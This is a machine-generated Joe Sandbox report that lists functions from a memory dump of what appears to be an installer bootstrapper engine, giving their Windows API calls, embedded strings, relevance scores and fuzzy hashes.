Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
String ID: *.*$.unverified
API String ID: 457978746-2528915496
Opcode ID: b4dfdc33122c38e7d7a7f14acff388377da4d5a9c891aa3812a0afe142638789
Instruction ID: 6a0f5e39912f250f4fb6a2ecf667a0661fda896e58f461af6f3f88d84c9d7bba
Opcode Fuzzy Hash: b4dfdc33122c38e7d7a7f14acff388377da4d5a9c891aa3812a0afe142638789
Instruction Fuzzy Hash: C841B631A0066CAEDF60ABA4DC09BEA77F8AF55301F4001E6E908E10A1EB758EC4DF55

Function 000D8733 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 000D8788
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 000D879A

Strings

feclient.dll, xrefs: 000D8762
crypt32.dll, xrefs: 000D8758
%04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 000D8771
%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 000D87E3

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Time$InformationLocalSpecificSystemZone
String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
API String ID: 1772835396-1985132828
Opcode ID: 7e1035aca2e4aa84b55acc5e42be842e627085727f394d54070a52229e3d4e1e
Instruction ID: 5f8b4a50436392270dcd61684c1323ba7800458a74bc5326714f715b33696229
Opcode Fuzzy Hash: 7e1035aca2e4aa84b55acc5e42be842e627085727f394d54070a52229e3d4e1e
Instruction Fuzzy Hash: 73210EA6901118FEE724DB959C05FBBB3FCEB48B11F10445AFA95D6180E738AD80D770

Function 000960BA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 000960EA
GetLastError.KERNEL32 ref: 000960F4

Strings

variable.cpp, xrefs: 00096112
Failed to get the user name., xrefs: 0009611C
Failed to set variant value., xrefs: 00096138

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastNameUser
String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
API String ID: 2054405381-1522884404
Opcode ID: 914e203b9b37daaaeba3e29e3beaddc6eb99310e3aaf20a82c4ea7d18675b0b2
Instruction ID: 23c261252cdf2b2c393bf50552adcce89d28ea4eaa7509c82b2d78facb0fe405
Opcode Fuzzy Hash: 914e203b9b37daaaeba3e29e3beaddc6eb99310e3aaf20a82c4ea7d18675b0b2
Instruction Fuzzy Hash: E101F971A01329A7DB20EB69DC09EEFB7A8DF00720F014157FC14E7242EE759E0496E1

Function 000CFD20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00000900,?,00000000,00000000,00000000,00000000,?,00000000,?,?,000D03EC,?,00000000,?,?,00000001), ref: 000CFD3F
GetLastError.KERNEL32(?,000D03EC,?,00000000,?,?,00000001,?,00095523,?,?,00000000,?,?,0009528D,00000002), ref: 000CFD4B
LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,000D03EC,?,00000000,?,?,00000001,?,00095523,?,?), ref: 000CFDB3

Strings

logutil.cpp, xrefs: 000CFD69

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: logutil.cpp
API String ID: 1365068426-3545173039
Opcode ID: 13b81457ea2b1f6d8e68c7255f68ff32c82b6e6df56342be3fa316bf8eaeee8c
Instruction ID: 3b7ac3d98c5eb39f8b409325b166e8afc15430ae56743afdb9aef172aa25c8ba
Opcode Fuzzy Hash: 13b81457ea2b1f6d8e68c7255f68ff32c82b6e6df56342be3fa316bf8eaeee8c
Instruction Fuzzy Hash: 7F116D3160121AEBDB21AF94CD05FFF7B6AEF54710F01402EFD0696160D7718A60E6A2

Function 000B6945 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000B68EF,00000000,00000003), ref: 000B695C
GetLastError.KERNEL32(?,000B68EF,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,000B6CE1,?), ref: 000B6966

Strings

msuengine.cpp, xrefs: 000B698A
Failed to set service start type., xrefs: 000B6994

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ChangeConfigErrorLastService
String ID: Failed to set service start type.$msuengine.cpp
API String ID: 1456623077-1628545019
Opcode ID: 0544372872f9928b181b16bf9b9be8a937d7c7bb7b58f9264bf7456252615cbd
Instruction ID: 5d115cb57f09331494fa2a79d93f5b865adb0dbd4ee49b89d51145b1067559c4
Opcode Fuzzy Hash: 0544372872f9928b181b16bf9b9be8a937d7c7bb7b58f9264bf7456252615cbd
Instruction Fuzzy Hash: 1FF030366493347AAA2126AA5C05A877EC8DF017B0B124326FD28E61D1DA25890096F5

Function 000C3BB0 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 000C3CA8
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 000C3CB2
UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 000C3CBF

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 3cda7e61b30d4157badc1a7e0588bbee00bf118a2407a1c3d08102b9ba7aa479
Instruction ID: a351b1afad7c4a3d440f3562c105fb209118978f47f5a75cc400498e153f14bf
Opcode Fuzzy Hash: 3cda7e61b30d4157badc1a7e0588bbee00bf118a2407a1c3d08102b9ba7aa479
Instruction Fuzzy Hash: E531D6759012189BCB21EF64DD88BDCBBB8BF08310F5041EAE81CA7251EB349F858F54

Function 000C4812 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,000C47E8,00000000,000F7CF8,0000000C,000C493F,00000000,00000002,00000000), ref: 000C4833
TerminateProcess.KERNEL32(00000000,?,000C47E8,00000000,000F7CF8,0000000C,000C493F,00000000,00000002,00000000), ref: 000C483A
ExitProcess.KERNEL32 ref: 000C484C

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5b086f88208b0b2cc13323e6551ea1d7c40bfbe4e118db77d4d7d75727fd82f7
Instruction ID: 571a6dd747ae3f32d732e43b34e5820ef2abfb4c72686baaa382dab47360b9fb
Opcode Fuzzy Hash: 5b086f88208b0b2cc13323e6551ea1d7c40bfbe4e118db77d4d7d75727fd82f7
Instruction Fuzzy Hash: 1DE01232401288EBDF016F11E829EAE3B69BF00341B060029F8048B122CB39E882CA94

Function 000CA3B0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb5ef6380223df80c09fbffff4406c54564286920eb9de1bd108dda9bf4439f2
Instruction ID: 9a1799d00e09890dec842bf027a0f2cedc81e3dc894066b26bf1fd1a8f6c887a
Opcode Fuzzy Hash: eb5ef6380223df80c09fbffff4406c54564286920eb9de1bd108dda9bf4439f2
Instruction Fuzzy Hash: 0C022B71E002199BDF14CFA9C880BADB7F1FF89318F25826ED919E7345D731AA418B91

Function 000D393B Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D3AC9: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,000D396A,?), ref: 000D3B3A

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000D398E
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000D399F

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AllocateCheckCloseInitializeMembershipToken
String ID:
API String ID: 2114926846-0
Opcode ID: 80b530eb7a33ee20856e6b3552828824d1127152af5cb8049581ab5c4de3a68b
Instruction ID: 21aeb3ae87c806b053413995501ab1e0c945bb560deaa5fc9eec3868658639e6
Opcode Fuzzy Hash: 80b530eb7a33ee20856e6b3552828824d1127152af5cb8049581ab5c4de3a68b
Instruction Fuzzy Hash: 281130B190031AEBDB10DFA5DC95ABFFBF8FF04300F50042EA545A6241D7B49A44CB62

Function 000D4315 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(000B8FFA,?,000002C0,00000000,00000000), ref: 000D4350
FindClose.KERNEL32(00000000), ref: 000D435C

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: be659acadd7fa854e4f0bcb987e33bf90f484796f531f764a6acad37a124c6e2
Instruction ID: d0eb0c3dc063ba86138e06cbda2325029d9f88a578112554df4397aa87527c9a
Opcode Fuzzy Hash: be659acadd7fa854e4f0bcb987e33bf90f484796f531f764a6acad37a124c6e2
Instruction Fuzzy Hash: 8901F971A00208ABDB20EF79DD89DAAB3BCEBC5325F400166FD18C3240DB349E4D8760

Function 000C2B21 Relevance: 2.7, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 000C2C91
comres.dll, xrefs: 000C2CC8, 000C2CE1, 000C2D09, 000C2D34

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID: 0$comres.dll
API String ID: 0-3030269839
Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction ID: 8cde676fd9f0028c158166d727adc1dc11220bdf6f99d39b93c0386defd859f9
Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction Fuzzy Hash: 1E51A960600B4597DBB89F684896FFE23D4EB22300F18451EF883DBE83C315DE419316

Function 000CED4C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000CED47,?,?,00000008,?,?,000CE9E7,00000000), ref: 000CEF79

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 4f9efb2c2c6f27e732342689ddd64fc1864c04e5bbf464321436cdea2f1d5dde
Instruction ID: 00ba5230619fd97d38436eaa30410d7624a28411dc2cd9c30e83b0f57af3b2f0
Opcode Fuzzy Hash: 4f9efb2c2c6f27e732342689ddd64fc1864c04e5bbf464321436cdea2f1d5dde
Instruction Fuzzy Hash: E7B12B311106499FD765CF28C48AF697BE1FF45364F25866CE89ACF2A2C335E992CB40

Function 000BE773 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002E77F,000BDEF8), ref: 000BE778

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1b43a662b16aad25f1eab50ad3976a0f4765fbc90f3dee0253e3b3045e099f9d
Instruction ID: 516265e0e59d3c8a09ad9a7067cf6748683b539e253da43ea5480ea9ceb12fef
Opcode Fuzzy Hash: 1b43a662b16aad25f1eab50ad3976a0f4765fbc90f3dee0253e3b3045e099f9d
Instruction Fuzzy Hash:

Function 000C0662 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: a924ba7203b363428ac804df42915b8d834a485457b58e9878f274434bb906fa
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 59C1C5322091A389DFAD4B79D434B3EBAE16FA27B131A575DD4B3CB0C5EE20C524D620

Function 000C0A97 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 75363d8973ee13015de7b65817ef75d80ea33b415b5f8a1c47d62e90aca10161
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 15C1E5322051A38ADFAD4B79D474B3EBAE16FA27B131A576DD4B3CB0C4EE20D524D520

Function 000C022D Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 32865f11fd13aa9e35959a92ee8044791fc879c8fdbdaa204d3e38a717b1383a
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: D3C184322051A38ADFAD4B799434B3FBAE15B927B131A576DD4B3CB0D4EE20C524D610

Function 000BFE15 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: aa27edf5bdd340346cf2cb1efe04a3b7115b69ed0cd8eaeb65b5fb9abdf0b45c
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 64C1B3322050A349DFAD4B79D434A3EFAE16FA27B131A576DD4B3CB1D5EE20C524D620

Function 000C2D50 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd02ccdbae6c4073a2c7b08c1fbfb8a6371803afebfe2a7625e4f37f520906ed
Instruction ID: ce444651bff57ab0edbbfe307e9b289a2e2918fef0002a3fcc016211ca2dcdc8
Opcode Fuzzy Hash: dd02ccdbae6c4073a2c7b08c1fbfb8a6371803afebfe2a7625e4f37f520906ed
Instruction Fuzzy Hash: 0D616C7121070997DAB8AB288895FFE73D4EB61300F14492EF943EFEC2DA619D829355

Function 0009CCB6 Relevance: 86.1, APIs: 3, Strings: 46, Instructions: 366COMMON

Download Yara Rule

APIs

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,comres.dll,00000000,000DCA64,?,00000000), ref: 0009CDEC

Strings

Catalog, xrefs: 0009CFE5
msasn1.dll, xrefs: 0009CF1D
embedded, xrefs: 0009CDFE
CertificateRootPublicKeyIdentifier, xrefs: 0009CF36
download, xrefs: 0009CDDE
Failed to get @SourcePath., xrefs: 0009D0EA
Failed to get @Container., xrefs: 0009D086
Hash, xrefs: 0009CFB0
LayoutOnly, xrefs: 0009CE86
version.dll, xrefs: 0009CF5C
Failed to get @CertificateRootThumbprint., xrefs: 0009D0C0
Packaging, xrefs: 0009CDBF
Failed to get @LayoutOnly., xrefs: 0009D090
CertificateRootThumbprint, xrefs: 0009CF73
Failed to find catalog., xrefs: 0009D0C7
Failed to hex decode the Payload/@Hash., xrefs: 0009D0D5
Failed to get @DownloadUrl., xrefs: 0009D0E3
external, xrefs: 0009CE1A
Invalid value for @Packaging: %ls, xrefs: 0009D0F9
Failed to select payload nodes., xrefs: 0009CCE4
Failed to hex decode @CertificateRootThumbprint., xrefs: 0009D0B9
Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0009D0B2
cabinet.dll, xrefs: 0009CF99
Failed to allocate memory for payload structs., xrefs: 0009CD42
Failed to get @FilePath., xrefs: 0009D113
DownloadUrl, xrefs: 0009CED2
Failed to get @FileSize., xrefs: 0009D0A4
Failed to get payload node count., xrefs: 0009CD09
Failed to get @Packaging., xrefs: 0009D10C
SourcePath, xrefs: 0009CEA9
payload.cpp, xrefs: 0009CD38
Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0009D0AB
comres.dll, xrefs: 0009CDA3
Container, xrefs: 0009CE44
Failed to get @Hash., xrefs: 0009D0DC
FileSize, xrefs: 0009CEFB
msi.dll, xrefs: 0009CF58
Failed to get next node., xrefs: 0009D121
Failed to get @Catalog., xrefs: 0009D0CE
feclient.dll, xrefs: 0009CE85
Failed to to find container: %ls, xrefs: 0009D07F
Payload, xrefs: 0009CCD1
wininet.dll, xrefs: 0009D007
FilePath, xrefs: 0009CDA4
Failed to get @Id., xrefs: 0009D11A
Failed to parse @FileSize., xrefs: 0009D09A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateCompareProcessString
